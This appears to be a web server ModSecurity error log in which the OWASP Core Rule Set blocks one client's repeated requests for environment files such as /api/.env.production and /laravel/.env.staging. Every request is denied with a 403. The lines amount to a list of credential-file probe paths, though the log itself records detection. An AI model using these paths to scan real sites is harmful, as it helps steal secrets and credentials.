[Sat Mar 21 04:10:09.061753 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "ab4MERsiL8ED2XitCKA8LQAAAAI"]
[Sat Mar 21 04:10:09.061941 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "ab4MERsiL8ED2XitCKA8LQAAAAI"]
[Sat Mar 21 04:10:09.355974 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.staging"] [unique_id "ab4MERsiL8ED2XitCKA8LgAAAAI"]
[Sat Mar 21 04:10:09.356131 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.staging"] [unique_id "ab4MERsiL8ED2XitCKA8LgAAAAI"]
[Sat Mar 21 04:10:09.356296 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.staging"] [unique_id "ab4MERsiL8ED2XitCKA8LgAAAAI"]
[Sat Mar 21 04:10:09.650638 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.local"] [unique_id "ab4MERsiL8ED2XitCKA8LwAAAAI"]
[Sat Mar 21 04:10:09.650797 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.local"] [unique_id "ab4MERsiL8ED2XitCKA8LwAAAAI"]
[Sat Mar 21 04:10:09.650937 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.local"] [unique_id "ab4MERsiL8ED2XitCKA8LwAAAAI"]
[Sat Mar 21 04:10:09.945025 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "ab4MERsiL8ED2XitCKA8MAAAAAI"]
[Sat Mar 21 04:10:09.945197 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "ab4MERsiL8ED2XitCKA8MAAAAAI"]
[Sat Mar 21 04:10:09.945374 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "ab4MERsiL8ED2XitCKA8MAAAAAI"]
[Sat Mar 21 04:10:10.251137 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.staging"] [unique_id "ab4MEhsiL8ED2XitCKA8MQAAAAI"]
[Sat Mar 21 04:10:10.251295 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.staging"] [unique_id "ab4MEhsiL8ED2XitCKA8MQAAAAI"]
[Sat Mar 21 04:10:10.251452 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.staging"] [unique_id "ab4MEhsiL8ED2XitCKA8MQAAAAI"]
[Sat Mar 21 04:10:10.545675 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "ab4MEhsiL8ED2XitCKA8MgAAAAI"]
[Sat Mar 21 04:10:10.545840 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "ab4MEhsiL8ED2XitCKA8MgAAAAI"]
[Sat Mar 21 04:10:10.545989 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "ab4MEhsiL8ED2XitCKA8MgAAAAI"]
[Sat Mar 21 04:10:10.840128 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /front/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONT/.env"] [unique_id "ab4MEhsiL8ED2XitCKA8MwAAAAI"]
[Sat Mar 21 04:10:10.840287 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONT/.env"] [unique_id "ab4MEhsiL8ED2XitCKA8MwAAAAI"]
[Sat Mar 21 04:10:10.840457 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONT/.env"] [unique_id "ab4MEhsiL8ED2XitCKA8MwAAAAI"]
[Sat Mar 21 04:10:11.134696 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.local"] [unique_id "ab4MExsiL8ED2XitCKA8NAAAAAI"]
[Sat Mar 21 04:10:11.134871 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.local"] [unique_id "ab4MExsiL8ED2XitCKA8NAAAAAI"]
[Sat Mar 21 04:10:11.135016 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.local"] [unique_id "ab4MExsiL8ED2XitCKA8NAAAAAI"]
[Sat Mar 21 04:10:11.429074 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env"] [unique_id "ab4MExsiL8ED2XitCKA8NQAAAAI"]
[Sat Mar 21 04:10:11.429260 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env"] [unique_id "ab4MExsiL8ED2XitCKA8NQAAAAI"]
[Sat Mar 21 04:10:11.429753 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env"] [unique_id "ab4MExsiL8ED2XitCKA8NQAAAAI"]
[Sat Mar 21 04:10:11.723950 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab4MExsiL8ED2XitCKA8NgAAAAI"]
[Sat Mar 21 04:10:11.724143 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab4MExsiL8ED2XitCKA8NgAAAAI"]
[Sat Mar 21 04:10:11.724299 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab4MExsiL8ED2XitCKA8NgAAAAI"]
[Sat Mar 21 04:10:12.018362 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "ab4MFBsiL8ED2XitCKA8NwAAAAI"]
[Sat Mar 21 04:10:12.018527 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "ab4MFBsiL8ED2XitCKA8NwAAAAI"]
[Sat Mar 21 04:10:12.018685 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "ab4MFBsiL8ED2XitCKA8NwAAAAI"]
[Sat Mar 21 04:10:12.315169 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "ab4MFBsiL8ED2XitCKA8OAAAAAI"]
[Sat Mar 21 04:10:12.315337 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "ab4MFBsiL8ED2XitCKA8OAAAAAI"]
[Sat Mar 21 04:10:12.315494 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "ab4MFBsiL8ED2XitCKA8OAAAAAI"]
[Sat Mar 21 04:10:12.609546 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.staging"] [unique_id "ab4MFBsiL8ED2XitCKA8OQAAAAI"]
[Sat Mar 21 04:10:12.609702 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.staging"] [unique_id "ab4MFBsiL8ED2XitCKA8OQAAAAI"]
[Sat Mar 21 04:10:12.609851 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.staging"] [unique_id "ab4MFBsiL8ED2XitCKA8OQAAAAI"]
[Sat Mar 21 04:10:12.903888 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.staging"] [unique_id "ab4MFBsiL8ED2XitCKA8OgAAAAI"]
[Sat Mar 21 04:10:12.904049 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.staging"] [unique_id "ab4MFBsiL8ED2XitCKA8OgAAAAI"]
[Sat Mar 21 04:10:12.904217 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.staging"] [unique_id "ab4MFBsiL8ED2XitCKA8OgAAAAI"]
